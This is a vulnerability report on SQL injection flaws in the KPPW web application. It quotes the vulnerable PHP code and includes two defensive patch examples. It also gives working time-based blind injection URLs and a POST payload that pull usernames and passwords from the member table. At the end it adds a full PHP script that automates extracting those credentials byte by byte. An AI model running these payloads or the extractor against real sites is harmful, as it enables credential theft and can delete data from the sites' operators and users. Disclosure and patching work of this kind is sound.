### Brief description:
KPPW latest version SQL injection vulnerability No. 7 (multiple distinct injection points)
### Details:
KPPW latest version SQL injection vulnerability No. 7, multiple distinct injection points.
First SQL injection:
File /control/user/transaction_works.php:
```
if($action == 'delete_image'){
    // $fileid is pasted straight into in(...) with no quoting and no integer check
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    // the same raw value is handed to delFileByFileId, which builds two more queries from it
    $resText = CommonClass::delFileByFileId($fileid);
    if($resText){
        $array = explode(',', $arrServiceInfo['pic']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_ids'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic');
        kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
    }
}
```
Note this line:
```
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
```
$fileid is placed inside `in(...)` without quotes and without any integer check, so everything after a closing parenthesis becomes part of the query. The proof of concept below supplies it through the `fileid` request parameter.
Second and third SQL injections:
Continuing further down:
```
$resText = CommonClass::delFileByFileId($fileid);
```
$fileid is then passed to delFileByFileId. Following that function:
File: /lib/inc/CommonClass.php
```
public static function delFileByFileId($fileId){
    // injection point: $fileId unquoted inside in(...)
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);
    $arrFileInfo = db_factory::get_one($strSql);
    $filename = S_ROOT.$arrFileInfo['save_name'];
    if(file_exists($filename)){
        unlink($filename);
    }
    // injection point: $fileId concatenated into the delete, no parenthesis to close this time
    return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);
}
```
Two more injections live here: $fileId is used unprocessed in both the select (inside `in(...)`) and the delete (`where file_id = `, with no parenthesis to balance), so both statements are injectable.
Fourth, fifth and sixth SQL injections:
The same problem appears again in /control/user/transaction_works.php, in the delete_goodsfile branch. Its own select, plus the select and the delete inside delFileByFileId, give injection points four, five and six:
```
if($action == 'delete_goodsfile'){
    // same unquoted $fileid in in(...) as the delete_image branch
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
    $arrFileInfo = db_factory::get_one($strSql);
    // and the same call into delFileByFileId with the raw value
    $resText = CommonClass::delFileByFileId($fileid);
    if($resText){
        $array = explode(',', $arrServiceInfo['file_path']);
        $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
        $_POST['file_path_2'] = implode(",", $newArr);
        updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
        kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
    }
}
```
The problem is identical to the one analysed above: all three queries reached from this branch are injectable.
Seventh SQL injection:
File /control/user/transaction_works.php:
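As an added example (this is not KPPW's code), here is one hardened form of the `$fileid` handling shared by `delete_image`, `delete_goodsfile` and `delFileByFileId`: the request value is reduced to a list of integers before any SQL is built, and the ids are bound as placeholders. It assumes a PDO connection `$pdo` in place of `db_factory`, the constants `TABLEPRE` and `S_ROOT` as in the original, and `$_REQUEST['fileid']` as the source of the value; `parseFileIds` and `delFileByFileIdSafe` are names chosen for this example.

```php
<?php
// Added example, not code from KPPW: a safe replacement for the $fileid
// handling used by delete_image, delete_goodsfile and delFileByFileId.
// Assumes a PDO connection ($pdo) instead of db_factory, and that TABLEPRE
// and S_ROOT are defined as in the original.

declare(strict_types=1);

/**
 * Turn the raw request value into a list of positive integers.
 * "5566" -> [5566]; "5566,5567" -> [5566, 5567];
 * "5566) and 1=if(...)#" -> [] (the whole list is rejected, not "repaired").
 */
function parseFileIds(string $raw): array
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        if ($part === '' || !ctype_digit($part) || (int) $part <= 0) {
            return [];
        }
        $ids[] = (int) $part;
    }
    return array_values(array_unique($ids));
}

/**
 * Same observable behaviour as CommonClass::delFileByFileId (look up
 * save_name, unlink the file, delete the row), but the ids travel as bound
 * parameters, so the SQL text never contains request data.
 */
function delFileByFileIdSafe(PDO $pdo, array $fileIds): int
{
    if ($fileIds === []) {
        return 0;
    }
    $marks = implode(',', array_fill(0, count($fileIds), '?'));

    $sel = $pdo->prepare(sprintf(
        'SELECT file_id, save_name FROM %switkey_file WHERE file_id IN (%s)',
        TABLEPRE, $marks));
    $sel->execute($fileIds);
    foreach ($sel->fetchAll(PDO::FETCH_ASSOC) as $row) {
        $path = S_ROOT . $row['save_name'];
        if (is_file($path)) {
            unlink($path);
        }
    }

    $del = $pdo->prepare(sprintf(
        'DELETE FROM %switkey_file WHERE file_id IN (%s)', TABLEPRE, $marks));
    $del->execute($fileIds);
    return $del->rowCount();
}

// Caller side: replaces the sprintf("... in(%s)", TABLEPRE, $fileid) lines.
// The rest of the branch (updating the service's pic/file_path list) is unchanged.
$fileIds = parseFileIds((string) ($_REQUEST['fileid'] ?? ''));
if ($fileIds === []) {
    http_response_code(400);
    exit;
}
$deleted = delFileByFileIdSafe($pdo, $fileIds);
```

Rejecting the whole list when any element is not a plain integer is deliberate: silently dropping the tampered element would hide probing from the application's logs.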
```
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
    $arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
    $goodsprice = floatval($goodsprice);
    $floatMinCash = floatval($arrGoodsConfig['min_cash']);
    if($floatMinCash&&($goodsprice < $floatMinCash)){
        $tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元';
        kekezu::show_msg($tips,null,NULL,NULL,'error');
    }
    if (strtoupper ( CHARSET ) == 'GBK') {
        $goodsname = kekezu::utftogbk($goodsname );
        $goodsdesc = kekezu::utftogbk($goodsdesc );
        $unite_price = kekezu::utftogbk($unite_price );
    }
    $arrData = array(
        'model_id' => $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6,
        'uid' => $gUid,
        'username' => $gUserInfo['username'],
        'indus_id' => $indus_id,
        'indus_pid' => $indus_pid,
        'title' => $goodsname,
        'price' => $goodsprice,
        'pic' => $file_ids,
        'content' => $goodsdesc,
        'unite_price' => $unite_price,
        'submit_method' => $submit_method,
        'file_path' => $file_path_2,
        'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
    );
    if(!$pk['service_id']){
        $arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
        $arrData['on_time'] = time();
        $arrData['service_status'] = 2;
    }
    $objServiceT = new keke_table_class ( 'witkey_service' );
    // $pk is the request-supplied pk[...] array; save() builds a WHERE clause from it
    $objServiceT->save ( $arrData,$pk);
    unset($objServiceT);
    if ($objId&&$intTaskId) {
        $strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId;
        $strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId;
        db_factory::execute($strBidSql);
        db_factory::execute($strWorkSql);
    }
    kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok');
}
```
Note this line:
```
$objServiceT->save ( $arrData,$pk);
```
The variable $pk reaches the save function. Following save:
File /lib/inc/keke_table_class.php:
```
function save($fields, $pk = array()) {
    foreach ( $fields as $k => $v ) {
        $kk = ucfirst ( $k );
        $set_query = "set" . $kk;
        $this->_table_obj->$set_query ( $v );
    }
    // the first key of $pk comes from the request (pk[...]=...) and is used as a column name
    $keys = array_keys ( $pk );
    $key = $keys [0];
    //echo $key."\n";
    //print_r($pk);
    //echo $pk[$key];
    if (! empty ( $pk [$key] )) {
        // the value is quoted; the key name $key is concatenated as-is
        $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
        $edit_query = "edit_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$edit_query ();
    } else {
        $create_query = "create_" . $this->_pre . $this->_table_name;
        $res = $this->_table_obj->$create_query ();
    }
    if ($res) {
        return $res;
    } else {
        return false;
    }
}
```
The value $pk[$key] is at least wrapped in single quotes, but the key name $key is the first array key of the request-supplied pk array and is concatenated into setWhere unchanged, so the attacker controls the column-name side of the condition. That is the SQL injection.
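As an added example (not KPPW's code), the following shows the one step of save() that needs to change: the WHERE fragment is only built when the pk key matches a known primary-key column for the table, and the value is required to be an integer. The column list (`witkey_service` => `service_id`, taken from the `pk[service_id]` in the proof of concept) and the integer-only rule are assumptions about the schema; `PkWhereBuilder` is a name chosen for this example, and the original's `_table_obj`/`setWhere` API is assumed to stay as it is.

```php
<?php
// Added example, not KPPW code: the WHERE-building step of save() with the
// $pk key restricted to known primary-key columns. The column list and the
// integer-only rule for key values are assumptions about the schema.

declare(strict_types=1);

final class PkWhereBuilder
{
    /** Per-table whitelist of the column that may appear in the WHERE clause. */
    private const PRIMARY_KEYS = [
        'witkey_service' => 'service_id',   // assumed from pk[service_id] in the PoC
    ];

    /**
     * Returns the WHERE fragment save() should pass to setWhere(), or null
     * when there is no usable pk (save() then takes the create branch, as the
     * original does). Throws instead of building SQL from an unrecognised key.
     */
    public static function build(string $table, array $pk): ?string
    {
        if ($pk === []) {
            return null;
        }
        $key = array_key_first($pk);
        $expected = self::PRIMARY_KEYS[$table] ?? null;
        if ($expected === null || $key !== $expected) {
            // "service_id=1 and 1=if(...)#" ends up here instead of in the query
            throw new InvalidArgumentException(
                "unexpected primary-key column for $table: " . var_export($key, true));
        }
        $value = (string) $pk[$key];
        if ($value === '' || $value === '0') {
            return null;   // mirrors the original's !empty() check
        }
        if (!ctype_digit($value)) {
            throw new InvalidArgumentException("primary key for $table must be an integer");
        }
        return sprintf(' `%s` = %d', $key, (int) $value);
    }
}

// Inside save(), in place of setWhere(" $key = '" . $pk[$key] . "'"):
//   $where = PkWhereBuilder::build($this->_table_name, $pk);
//   if ($where !== null) { $this->_table_obj->setWhere($where); /* edit_* */ }
//   else { /* create_* */ }

// The key from the proof of concept is refused before any SQL exists:
try {
    PkWhereBuilder::build('witkey_service', ['service_id=1 and 1=if(1,sleep(5),2)#' => '222222']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
// A legitimate edit still produces a usable fragment:
echo PkWhereBuilder::build('witkey_service', ['service_id' => '1']), "\n";
```

Whitelisting the column name is the important part; escaping the value alone would not help, because the injected text never sits inside the quoted value.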
### Proof of vulnerability:
First SQL injection:
```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23
```
The response is delayed by 5 seconds, which shows the first character of the username is `a`; repeating the request for other positions and characters extracts the user information. The `)` closes the `in(` list and `%23` (`#`) comments out the rest of the statement.
Second and third SQL injections:
```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)
```
The response is delayed by 5 seconds, which shows the first character of the username is `a`; continuing the same way extracts the user information. Without the closing parenthesis the expression is still valid inside `in(...)`, so this one request reaches the select in the branch, the select in delFileByFileId and the `where file_id = ...` delete. Test with a file_id that does not exist: if it does, a true condition deletes both the row and the file on disk.
[![1.png](https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png)](https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png)
Seventh SQL injection:
```
POST http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork

formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=
```
The response is delayed by 5 seconds, which shows the first character of the username is `a`; the rest of the user information follows the same way. Decoded, the parameter name is `pk[service_id=1 and 1=if(...)#]`, so save() receives `$key = "service_id=1 and 1=if(...)#"` and the `#` comments out the ` = '222222'` that setWhere appends. The formhash must be the token issued to the submitting session, since the whole branch is gated on kekezu::submitcheck().
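The "continue the same way" step above, written out as an added example that is not part of the original report: it drives the first injection point's time-based oracle character by character, using the same subquery as the proofs but comparing on `ascii()` so that each probe halves the candidate range instead of testing one character value. The host and path are the ones from the proof of concept; the 5-second sleep, the session cookie and the use of `file_get_contents` as the HTTP client are assumptions.

```php
<?php
// Added example, not part of the original report: automates the time-based
// oracle from the first proof of concept. Host, sleep length and the session
// cookie are assumptions; the subquery is the one used in the report.

declare(strict_types=1);

const TARGET   = 'http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=';
const SLEEP_S  = 5;
const COOKIE   = 'PHPSESSID=replace-with-a-valid-session';   // assumed: do=user pages need a login
const SUBQUERY = '(select concat(username,password) from keke_witkey_member limit 0,1)';

/** One probe: true if the server stalled for at least SLEEP_S seconds. */
function oracle(string $condition): bool
{
    // Same shape as the report's payload: close the in( list, inject, comment out the rest.
    $payload = sprintf('5566) and 1=if(%s,sleep(%d),2)#', $condition, SLEEP_S);
    $ctx = stream_context_create(['http' => [
        'header'        => 'Cookie: ' . COOKIE . "\r\n",
        'timeout'       => SLEEP_S * 3,
        'ignore_errors' => true,
    ]]);
    $t0 = microtime(true);
    @file_get_contents(TARGET . rawurlencode($payload), false, $ctx);
    return (microtime(true) - $t0) >= SLEEP_S;
}

/** Binary-search the byte at $pos of the subquery result; null once past the end. */
function extractByte(int $pos): ?string
{
    $cell = sprintf('ascii(mid(%s,%d,1))', SUBQUERY, $pos);
    if (!oracle("$cell>0")) {              // mid() past the end yields '', and ascii('') = 0
        return null;
    }
    $lo = 1;
    $hi = 255;
    while ($lo < $hi) {                    // invariant: the byte lies in [lo, hi]
        $mid = intdiv($lo + $hi, 2);
        if (oracle("$cell>$mid")) {
            $lo = $mid + 1;
        } else {
            $hi = $mid;
        }
    }
    return chr($lo);
}

/** Pull the whole concat(username,password) value, at most $maxLen bytes. */
function extractAll(int $maxLen = 96): string
{
    $out = '';
    for ($pos = 1; $pos <= $maxLen; $pos++) {
        $b = extractByte($pos);
        if ($b === null) {
            break;
        }
        $out .= $b;
        fwrite(STDERR, "[$pos] $out\n");
    }
    return $out;
}

echo extractAll(), "\n";
```

Each byte costs about eight probes, and only the probes whose condition is true pay the sleep. The threshold is satisfied by a single sleep, so it does not matter how many of the three affected queries actually execute for a given request. On a noisy link a slow response is misread as "true"; repeat the probe or raise SLEEP_S if results look inconsistent. `ascii()`/`mid()` work per character, so usernames containing non-ASCII characters need `ord()` instead.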